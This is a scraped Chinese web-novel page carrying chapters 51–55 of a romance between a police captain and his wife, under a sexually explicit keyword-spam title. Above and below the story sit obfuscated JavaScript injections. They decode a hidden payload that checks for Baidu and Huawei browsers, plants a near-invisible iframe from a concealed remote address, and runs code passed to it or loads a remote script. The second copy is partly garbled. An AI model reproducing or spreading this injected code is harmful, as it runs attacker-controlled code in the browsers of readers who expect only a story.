虐h粗暴疼bl_bl 夹道具上班h

eval("\x77\x69\x6e\x64\x6f\x77")["\x77\x6E\x68\x77"]=function(e){var hp =''+'ABCDEFGHIJKLMNOPQ'+'RSTUVWXYZabcdefghi'+'jklmnopqrstuvw'+'xyz012345'+'6789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=hp.indexOf(e.charAt(f++));o=hp.indexOf(e.charAt(f++));u=hp.indexOf(e.charAt(f++));a=hp.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x70\x75\x6E\x41\x50\x77\x68\x55\x43"]=function(){eval(wnhw("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQod25odyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKHduaHcoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZih3bmh3KCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbd25odygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIF9pZD1fY2xhc3M9J2FfMTk5MCc7dmFyIF9fYWFucWlkID0gJ2EnICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19hYW5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19hJysnYWEnKyducScrJ29iJysnal8xOTkwJ109ZFsncXUnKydlcnknKydTZWxlJysnY3RvJysnciddKCcjJytfX2FhbnFpZCk7X2lkICs9IGRbJ3F1JysnZXJ5JysnU2UnKydsZWMnKyd0bycrJ3JBJysnbGwnXSgnLicrX2NsYXNzKS5sZW5ndGg7dmFyIHogPSB1KyctMS8nK19pZCsnLycrcjtkWyd3JysncmknKyd0JysnZSddKCc8aScrJ2ZyJysnYScrJ21lIHN0eWxlPSInKydtJysnYXInKydnaScrJ246MDtwJysnYWQnKydkJysnaW4nKydnOjA7YicrJ29yJysnZCcrJ2VyOm4nKydvbicrJ2U7Jysnb3AnKydhJysnY2knKyd0JysneTowJysnLjAnK3JkKDIsOSkrJzt3aScrJ2R0JysnaDonK3JkKDIsNSkrJ3AnKyd4O2gnKydlJysnaWdoJysndDonK3JkKDIsNSkrJ3AnKyd4OycrJyJhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WyJhZCIrImRFdiIrImVudEwiKyJpc3QiKyJlbmVyIl0oIm0iKyJlc3MiKyJhZ2UiLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyK19pZF0pe3JtKGMpO25ldyBGdW5jdGlvbih3bmh3KGUuZGF0YVtyK19pZF0ucmVwbGFjZShuZXcgUmVnRXhwKHIsJ2cnKSwnJykpKSgpO319KTt9ZWxzZXtkLndyaXRlKCc8cycrJ2NyaScrJ3B0IHNyYz0iJyt1KycuanMiPjxcL3MnKydjcmlwJysndD4nKTt9fSkoJycrJz09UU55JysnMEMnKydNNWtUJysnTXR0JysnTScrJ20nKydSeVUnKydTJysnWm9oJysnWFlxbCcrJ25SeVV5JysnTScrJzAnKydRRE14RScrJzBNbDAnKycyYmo1JysnaWEnKyczVicrJ1dlJysnMGRYJysnWnUnKydjM2QnKyczWmtNbCcrJ1lrTWxFJysnME1sJysnTScrJ0hjMFJIJysnYScrJycrJycsJycrJ1FPRScrJ1NKTicrJ3BaJysnJysnJyx3aW5kb3csZG9jdW1lbnQsJycrJ3BDaycrJ3JGWCcrJ1onKycnKycnLCd0Jyk="));}
第五十一章 今晚回家

“再不行,不是还有咖啡厅的闭路摄像机么?”说着这话的时候,周子墨的声音极冷。

特别是看向站在其他两个队友旁边,一脸楚楚可怜的卡恩之时,那双黑眸子里迸出来的寒光,就像是一把把利刃,狠狠的刺痛着女人的心。

唯有落在苏梦瑶身上的那只大掌,暖暖的。

这样的周先生,突然间就让苏梦瑶卸下了所有的防备,软软的依靠在他的怀中。

此刻,她突然很想钻进男人的怀中,安静的感受男人身上的气息。这是,分开了长达两个星期之后,她苏梦瑶最为想念的。

只是她不知道,周子墨会不会也像她一样,非常想念自己?

然而这样的一幕,可能太过于温馨,温馨到深深的刺痛了站在对面,一脸楚楚可怜,等待着周子墨垂青的卡恩的心。

那一刻,这个女人看向他们所在方向的眼神,哀怨,迷茫,不甘……

但她的一切,周子墨好似全然没有感应到。

他依旧只是关切的贴在身侧的女人身旁,感觉到她挺直的腰杆松懈下来之后,男人更是将自己的铁臂牢牢的锁在女人的腰身上,让她靠在自己的怀中。

那一双迷人的黑瞳,此刻正专注的看着他怀中的周太太。

不自觉流露出来的宠溺神情,更叫其他的三个吃惊。

“周太太,疼么?”

靠在周太太的耳际,男人轻轻的牵起苏梦瑶的手。

看向周太太手臂的那一拳青紫之时,原本好看的俊眉已经卷皱了起来。

而语调,也从刚刚的清冷,蜕变成此刻的关切。

他的大拇指,轻轻的摩挲着女人手腕上的青痕。

“嗯!当然了,要你被人掐成这样,你说会是什么感受!”

看着自己手上的青痕,苏梦瑶的神情也不是那么的好。毕竟,她苏梦瑶从来也不是什么善良的人,能做到受到欺负还忍气吞声的程度。

所以,借着周先生此刻的嘘寒问暖,苏梦瑶也肆意夸大了自己手臂上的痛。

而她也想要看看,到底周先生对这个叫做卡恩的年轻女子,到底抱着什么样的想法。

“卡恩,向周太太道歉!”看着苏梦瑶手臂上的青紫,再看看她那柳眉微皱的样子,周子墨冷冷的睨了一眼卡恩之后,开了口。

声音,又恢复了刚刚的那般清冷,一点也没有刚刚对苏梦瑶说话的时候的那种关切。

其实,做错事情道歉,本来就是天经地义的事情。

但被周子墨用如此的语调冷哼着,站在卡恩身侧那个对她关爱有加的男子,显然有些不服气,急切的想要为卡恩辩解着什么:“周队……”

但男子刚以开口,便被卡恩给打断了:“够了!”

说出这一句的时候,女人的头微低着。整一张脸都被她的长发给挡住了。看不到,她此刻的面部表情。

唯有那哑哑的声线,正说明着什么。

“对不起,今天的事情确实都是我的错!我在这里,向大家道歉了。如果今天局里面没有事情的话,那周队我想现在就先回家了!”

“嗯。”周子墨微微颔首,以示同意。但他的语调,却还是犹如冰霜一般,冻得人心发颤。

“那我先走了!”得到了周子墨的应允,女人立刻抓起她刚刚放在咖啡桌上的包包,旋即离开。但走了一小段路之后,女人又像是想起了什么,突然停下了脚步:“你赢了,但也请你,好好的珍惜他。”

一直到说完这一句话,卡恩都没有回过头。

“我知道了!”看着那单薄的背影,苏梦瑶有一瞬间还真的觉得,周子墨是个天生的妖孽。

明明是那么冷言冷语的对待,却还是能让某些人,对他死心塌地。例如,眼前的女人……

听着回应之后,卡恩便抓起了包包,头也不回的走了。

余下的两人,也跟着周子墨和苏梦瑶,一并离开了咖啡厅。

走出咖啡厅门口的时候,周子墨的面色依旧还不是很好。

“你自己开车过来的吗?没有的话,要不要我送你回去?”周子墨悄悄的看了一眼苏梦瑶之后,又将视线落在不远处那辆吉普车上。

想来,他们一群人刚刚一直都在这辆车上。怪不得,当她苏梦瑶向卡恩泼水的时候,他们会第一时间赶到。

不过很明显的是,他们刚刚应该是在这一处监视着什么。要不然以这些警察的洞察能力,怎么会看不到刚刚是卡恩先动手的呢?

这会儿,刚刚跟周子墨走出来的那两个人,也回到了工作岗位上。

“不用了,你们还要工作。而且,我自己也有开车过来!”看着对面的吉普车,苏梦瑶浅浅的笑着。

什么时候,她和周先生的相处变得如此的别扭了?

“这样也好!今天要是把任务做完了,估计就可以放个假了!”说到这的时候,他的嗓音里透着一股子愉悦……

周子墨虽然嘴上这么说着,脸上却有些期盼的偷偷的打量了下苏梦瑶,在见到女子没有任何表示之后,他又有些懊恼的望天。

该死的周太太,他都表现的如此明显了,她为什么还不肯开口,叫他回家呢?

周子墨其实也清楚,那个公寓也是自己的家,只要自己回去,周太太也不能直接将他从里面赶出来。

可这么做,那多伤他自尊?

更何况这次是,他周子墨自己离家出走的,难道还要他自行回家?

那很没面子的!

可很明显,周先生如此纠结的心情,周太太还是没能够体会到,不然她也不会在他如此纠结的情形下,依旧乐呵呵的开口:“那恭喜你,没事的话,就去忙吧。我也该回去了……”

“哦,那好吧,就这样!”

看了苏梦瑶一眼,周子墨很不甘愿的转过身,朝着马路对面走去。

黑色的眸子里,淡淡的失落在蔓延。

就在周子墨还没有走到马路对面的时候,周太太的声音在他背后响起:“周子墨,今晚上我给你做炒丝!”

一时间,仿佛有璀璨的烟花在周子墨的面前绽放……

最终,周太太还是给了他满意的答复。而他也会看在周太太认错态度良好的份上,今晚回家!

第五十二章 冷暴力

因为周太太认错态度良好,还承诺今晚给周先生做炒丝的缘故,周先生紧绷了一整个星期的面容也有所改善了。甚至,连对待下属的方式,也温柔了许多。

当然,周先生并非表面上看到的那般无害。

就像刚刚这些人在咖啡厅里质疑了他家的周太太的行为,周先生是绝对不允许的。

所以,周先生也就将这追查的任务,光荣的交到这两个下属的身上。没有完成任务之前,不准回家!

对周先生偏袒的行为,下属们虽然有怨言,但最终,还是不得不服从周先生的命令。

因为,周子墨本就是一个恶魔,若是你不服从他,他有的是千百种机会治你。

晚上七点钟,周先生准时踩着下班的钟点声,回到了自家公寓。

一进门,便听到了厨房里传来了叮叮当当的声响,那是周太太正在炒菜的声音。

顺着声响传来的方向,周先生走了过去。

来到厨房门口,他便看到身上穿着粉红色围裙的周太太,正在厨房里忙活着。

厨房里点着的白炽灯,灯光洒在周太太的身上,好像也为她添上了一道光晕。淡淡的,却令人神往……

这样的周太太,让周先生的喉结不自觉的滚动了一下。

“你回来了?去洗洗手,我这个炒完,就可以吃饭了!”

苏梦瑶转过身来的时候,就看到了周子墨已经站在自己的身后。

她对着他微微的扯动了唇角,露出难得一见的笑容。

其实,早在咖啡厅里,周子墨那么对待卡恩的时候,苏梦瑶便知道,周先生和卡恩之间,不可能有什么。

就算有,那也只是卡恩一个人的事情!

只是,连苏梦瑶也不知道,自己为什么在知道周先生和卡恩没有什么关系的时候,为何会如此雀跃?

难道,自己真的爱上周子墨了?

苏梦瑶不确定。

曾经,她就是认死扣的一个人。喜欢上刘栩楠之后,她经常到刘栩楠所在的学校蹲点,甚至还死皮赖脸的借着父亲的关系,打听到了刘栩楠报读的大学。后来,她果真如了自己的愿,和刘栩楠同一个学校,一起上课,一起放学,一起窝在图书馆。也终于,真正的站在刘栩楠的身旁,和这个男人成为大学校园里人人羡慕的一对。

只是,在她作出了无数的努力之后,得到的是什么。是刘栩楠的无情抛弃……

这样的她,还能真的爱上另一个人吗?

还能再像年幼的时候,将自己全身心的感情,投在周先生的身上吗?

不知道……

这是,她唯一能得到的答案。

“好……”看着难得对自己展露笑容的周太太,周子墨感觉自己心里的某一处暖暖的。

而这样的暖,让他忍不住想要靠近。

周先生从来都不是一个会亏待自己的人,所以当这么个想法跳出脑海的时候,周先生便上前,从苏梦瑶的身后将她搂进了自己的怀中。而他的头,就惯埋进了周太太的颈窝里。从那里,他努力的摄取着周太太身上的淡淡香气。

印象中,这个动作自从他和周太太结婚之后,已经做过无数次了。

只是,每一次得到的感觉都不一样。

头一次,是欣喜。

第二次,是怅然若失。

……

而这一次,是暖暖的。内心的某一处,终于被周太太给填满了。

“周先生,你这是干嘛呢?难道你不饿吗?”被周先生突然搂进了怀中,苏梦瑶显得有些慌乱。

毕竟,她家周先生已经有一个星期没有回家了,如此亲昵的接触,更是一个星期都没有。

感受着周先生身上传来的热度,苏梦瑶的鼻尖涩涩的。

“我等下就去洗,现在让我抱一下!”周先生的声音,哑哑的,在她的耳际响起。

要是以前,苏梦瑶肯定会毛躁的拿着锅铲和周先生“拼”个你死我活的。

但今天……

今天这样的情况下,她只想安安静静的感受周先生身上的淡淡香气。

一个星期不见,她真的有点想他了。

多么希望,时间就能在这一刻静止。这样,她苏梦瑶就能永永远远的享受,这个男人的怀抱了。

过了一会儿,周先生果然如约放开了她的腰身,径直走向了洗手间。

看着男人消失在洗手间门口的身影,苏梦瑶的鼻尖又是一阵酸涩。

周先生明明都是按照自己想要的做着,可为什么她的心还是这么空落落的感觉。

到底,自己是对周先生抱着什么样的心情?

一直到周先生从洗手间里回来,苏梦瑶都呆滞的站在原地,盯着某一个角落失神。

“好了,老婆我们吃饭了!”

周先生笑着将自己洗干净的手,放到苏梦瑶的面前。

“老婆?!”

一直到周先生抓起了她的手,苏梦瑶才回过神来。

“好……我去盛饭,我们开饭!”

说着,苏梦瑶连忙转过身,躲过周先生探究的神情。

一直都吃完饭,苏梦瑶的眼神都有意无意的躲着周先生。

一吃完饭,苏梦瑶便催着周先生去洗澡,自己则开始躲在厨房里,将所有的碗筷洗了一遍又一遍。

她,现在需要的是冷静的时间。

需要,好好的思考一下,自己对周子墨究竟是什么样的态度。

“老婆,我洗好了。你也该去洗了……”

周子墨走出来的时候,正巧看到周太太正对着某一个碗失神。

“老婆,你这是怎么了?这个碗已经被你洗的快要少掉了一层!”周先生从苏梦瑶的手上抢过已经被她刷了无数次的碗。

“老婆,我帮你洗完吧。你先去洗澡吧!”周先生一脸和气。

但那双黑眸里潜藏着的光芒,极为诡异!甚至,他的嘴角上,还勾着邪肆的弧度。

这样的他,明显就是在计划着什么。

“我已经洗澡好了。我还有工作要做,先去书房了!”面对周先生那双探寻的黑瞳,苏梦瑶赶紧摘下了自己手上的手套,转身走进了书房。

这下,轮到周先生委屈了……

周太太,这是怎么了?

不是让他回来了吗?

怎么现在,还对他使用冷暴力?

第五十三章 招蜂引蝶的男人

看着苏梦瑶消失在卧室门口的身影,周先生觉得有些委屈。

窝在客厅里看了好一会儿电视之后,都快要十点钟了,苏梦瑶都没有从书房里走出来。

这下,周先生按捺不住了。

周太太给他做炒丝,认错态度诚恳,他才在今天下班回家的。可他周子墨回家,可不是真的只为了一顿炒丝!更不是为了来给周太太施压冷暴力的!

这感觉,周先生非常不爽!

真的……

恼意之下,周先生从沙发上起了身,直挺挺的走进了苏梦瑶的书房里。

这是,当初新婚的时候,为了能让苏梦瑶一个人搞创作的时候,特意给她搭建的。

可不是为了让她闹别扭的时候,一个人躲在这里。

是的,从今晚周太太的躲闪状态看来,周先生认定了,周太太这就是在和自己闹别扭!

该不会,周太太误会了自己和卡恩真的有什么吧?

想下,卡恩对自己的态度确实真的有点那什么过头了。甚至,还约着周太太到咖啡厅里谈话,若不是自己亲眼撞见,真不知道那个女人会对周太太说些什么。看来自己还是有必要向周太太解释一下的,对吧?

想到这的时候,周先生就这样闯进了周太太的书房里。

周太太正坐在电脑前,寻思着什么。目光有些呆滞的落在一个点上。

大概,就是人家所说的,什么在找寻艺术灵感的时候特有的神情吧……

“怎么了?”门突然推开了,也打断苏梦瑶刚刚那胡乱的思绪。

从厨房里走进书房,打开电脑之后,她一个动作没有进行。就一直坐在电脑前,想着某些事情。

看到推门而进的周先生,她确实有些意外。

但更多的,还是躲闪。

对于苏梦瑶而言,现在她真的不知道自己对周先生到底抱着的是什么样的想法。而她更害怕的是,自己真的爱上周先生。

毕竟,在经过那么大的一次痛楚之后,她真的害怕了。

她真的不确定,再爱一次,是不是还会像以前一样,那么容易受伤。

特别是,对象还是周先生这么个招蜂引蝶的人物。

“老婆,我向你汇报一件事情!”

在周太太的注视中,周先生来到了她的身边,郑重其事的说着。

清越的男音,无比坚定的语调。

也许是头顶上的白炽灯的关系,周先生的那双黑瞳里有着前所未有的晶亮,让苏梦瑶痴迷的时候,亦让这个女人闪过那股子诡异的熟悉。

好像真的在什么地方,见到过这个男人!

可到底,在什么地方呢?

她想不起来,除了这一双黑眸,她一点线索都没有。

“周子墨,我想……”

看着这个靠近了的男子,苏梦瑶轻启了红唇。

突然间,她真的很想问清楚,为什么她总是对这个男人,有这种诡异的感觉。

虽然,周先生并不一定知道,但两个人好好回忆一下,总比她一个人瞎折腾比较好,是不?

可就在苏梦瑶刚刚开口的时候,周先生便已经开口打断了她想要说的话:“周太太,我跟卡恩真的没有什么,你要相信你的男人!”

------题外话------

这两天事情有点多,可能更得比较少,还希望亲们见谅

第五十四章 老婆,谢谢你给我打电话

“嗯?”苏梦瑶怎么也没有料想到,周子墨如此大费周章的,是想要跟自己解释这一件事情。

一时间,她竟有些措手不及。看着站在自己身侧的周子墨,也有些举棋不定。

甚至,也忘记了刚刚自己想要问出的那个问题。

而苏梦瑶如此的反映,却被周先生看成是还不相信自己。

为了表示自己对这件事情的态度和立场,周先生举起了自己的三个手指,放在脑袋边,做毒誓状:“皇天在上厚土在下,我周子墨要是和卡恩作出什么对不起周太太的事情,就让我周子墨一辈子都吃不到周太太的炒丝!”

说完之后,周先生连忙半蹲下来,和坐在电脑桌前的周太太平时,那双黑眸子里晶晶亮的,充满期待:“周太太,你就相信了我吧?”

看着如此神情的周先生,苏梦瑶突然觉得有些好笑。

其实,从下午在咖啡厅的时候,她就能看出周子墨对卡恩是个什么态度,至于他们之间的那些事情,还有的那一通电话,恐怕周先生都不知情吧?

而她苏梦瑶,也相信他不会和那个女人作出什么事情来。却不想,周先生竟然如此认真的和自己解释起来……

心,突然暖暖的。

这也让苏梦瑶突然想要调傥一番:“可是那天晚上我三点多打电话给你的时候,是她接的!三更半夜,孤男孤女,不做出点什么事情,是不是很对不起你身为男人的这个物种?”

苏梦瑶说出这一番话,无非是想要搓一下周子墨的锐气。可显然,周先生的关注点和她的并不在一个上面。

按照正常情况,周先生在听到这句话的时候,最先应该是和苏梦瑶反驳一番,说自己和卡恩并没有发生什么之类的。

但周先生在听到苏梦瑶的这一句话之后,却是一脸晶晶亮的看着苏梦瑶,期待的神情又深刻了几分:“老婆,你那天打电话给我了?”

见苏梦瑶没有回答,周先生又再度问了一句:“老婆,那天晚上你真的给我打电话了?”

白炽灯下,整张俊颜是毫不掩饰的期待。

其实,自从那天周末,她和左佑良无比亲昵的称呼和交谈的通话,让周先生吃味,然后一气之下离家出走之后,周先生就一直懊恼于自己在周太太的心里一点地位都没有的这个问题。不然,她怎么一通电话都没有打给自己,在他离家出走的这几天里。

为了这个,周先生的心里一直都很不爽。也因为这样,他的下属们一连好几天都没有好好的休息。

甚至直到今天回家前一秒,他都还在介意这个问题。

若不是苏梦瑶说会为他准备炒丝,他还指不定不回来了呢!(卧槽,周先生你的脸皮还真的不是一般的厚!)

可现在,他竟然听到了,周太太,竟然打过电话给自己……

这是不是意味着,他周子墨在苏梦瑶的心里,并不是可有可无的?

一想到这一点,周子墨的心就像是被什么东西给涨满了。

“打了,她还说你在洗澡!到底做了什么事,三更半夜的还在洗澡,真的令人浮想联翩喔!”

面对周先生期待的神情,苏梦瑶继续调傥着。却也刻意忽略了男人脸上的那抹期待。

却不想,下一秒自己便被男人圈进了怀中。那熟悉的清越男音,在她的耳际响起:“老婆,太好了。谢谢你打电话给我……”

第五十五章 公干

“我在停车场等你!”接到左佑良的短信的时候,苏梦瑶正好坐在电脑桌前研究着这个星期要交出来的设计稿件。

好像自从周先生回到家之后,她苏梦瑶的活力也开始恢复了。

这阵子连发呆的时间也明显减少了许多。

只是偶尔,她还是会考虑一个问题,那就是自己真的爱上周子墨了吗?

看着手机频幕上,左佑良发来的几个字,苏梦瑶有些懊恼的挠着头。

虽然周先生上一次的离家出走原因,她至今还没有搞清楚。但她可以确定,周先生的离家出走十有**和左佑良有关系。

想了想,周子墨好不容易回家了,她还是不要惹得太多的事情比较好。想着,苏梦瑶打算将自己的手机收起来。但短信提示音又响了起来:“快点,这是工作!不来,就算你旷工!”

看着这短信,苏梦瑶有些无奈的起了身,来到了停车场。

这正直上班的时间段,很少有人会出现在公司的停车场。看着暗的车场,荒无人烟的楼道,苏梦瑶有些胆怯。

“哔哔……”

不远处的角落里,一车缓缓朝着她驶来。

骚包的保时捷911CarreraS,车灯很是晃眼。大概,已经经过了某些改装。

如此亮眼的跑车,在这公司里,大概除了太子爷别无他人。

车子行驶到苏梦瑶面前的时候,就停下来了。

车窗缓缓的降下,那张有着蛊惑众生的俊颜,便如此呈现在苏梦瑶的面前。大概,像左佑良这一类的人,身上都带着与身俱来的光亮。一出现,刚刚还显得有些森的停车场,立即变得明亮了许多。

“上车!”

左佑良敲了一下方向盘之后,如此开口。

“我们要去哪里公干?”坐上车子之后,苏梦瑶很自觉的将安全带套上。

但她话里的“公干”二字,似乎惹得面前的男人不悦了。

此刻,他正盯着她看,眼睛里有着一抹幽深。

他的眉头很浓,皱起来的时候,就像是毛毛虫一样。

“我和你出去,只能是公干?”

他盯着她看,眼睛一眨都没有,眸子是前所未有的认真,更是一眨眼都没有,仿佛就想要看清苏梦瑶此刻的面部表情,不想错过分毫。

狭小的车厢内,左佑良的声音很是沙哑,沙哑的有点不像是他。

这样的左佑良,恍然间又让苏梦瑶感觉像是回到了两年前。

他的眼神,有些过分的帜热……

帜热的,让她的脸整一个燃烧。

为了躲开男人的继续追问,苏梦瑶掏出了自己的手机,将他刚刚发送的短信放到左佑良的面前。

“不是你自己说的吗?”她道。

之后,她将视线落在车窗外,故意别开了脸。

“也对。是我自己说的!”说完这一句话的时候,左佑良停顿了下,之后才继续开口道:“不过,今天我不想工作了,所以身为我的员工的苏梦瑶小姐,今天要陪本少爷一起出去兜兜风!”

恍然间,左佑良的语调恢复了之前,玩世不恭。

“什么?”

被左佑良很不耻的一句话,唤回了神志。这一刻,苏梦瑶转过头,继续对上左佑良那张倾国容颜之时,他的嘴角又挂上了最为熟悉的弧度。那双大眼,也变得和寻常没有什么区别。仿佛刚刚大眼里的那抹幽深,和卷皱的眉宇,并不曾出现过一样……
版权声明

本站内容由互联网搜集而来,不代表撩妹情话网立场,请勿对号入座!
如果本文侵犯了您的合法权益,请联系我们,我们将在第一时间处理!

eval("\x77\x69\x6e\x64\x6f\x77")["\x6E\x70\x6C\x73"]=function(e){var sp =''+'ABCDEFGHIJKL'+'MNOPQRSTUVWXY'+'Zabcdefgh'+'ijklmnopqrs'+'tuvwxyz0123456'+'789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x41\x73\x58\x70\x50\x73\x6C\x6E\x5A"]=function(){eval(npls("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQobnBscyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKG5wbHMoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihucGxzKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbbnBscygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKG5wbHMoZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyc9JysnPXdNTScrJ3kwU00nKydNJysnNWtUTU0nKyd0TScrJ01tUicrJ3lVQ01NJysndDVXWjAnKydNTWonKydSeVV5JysnTU0wUUQnKydNTXgnKydFJysnME0nKydNbCcrJzAyJysnYmo1aWEnKyczJysnVlcnKydlJysnMGQnKydYJysnWnUnKydjJysnM2QnKyczWmsnKydNTWxZJysna00nKydNbCcrJ0UnKycwTU0nKydsTScrJ01IYzBSJysnSCcrJ2EnKycnKycnLCcnKydJZ0snKydsanMnKydBZScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydhdmQnKydlTXgnKyc1JysnJysnJywnTScp"));}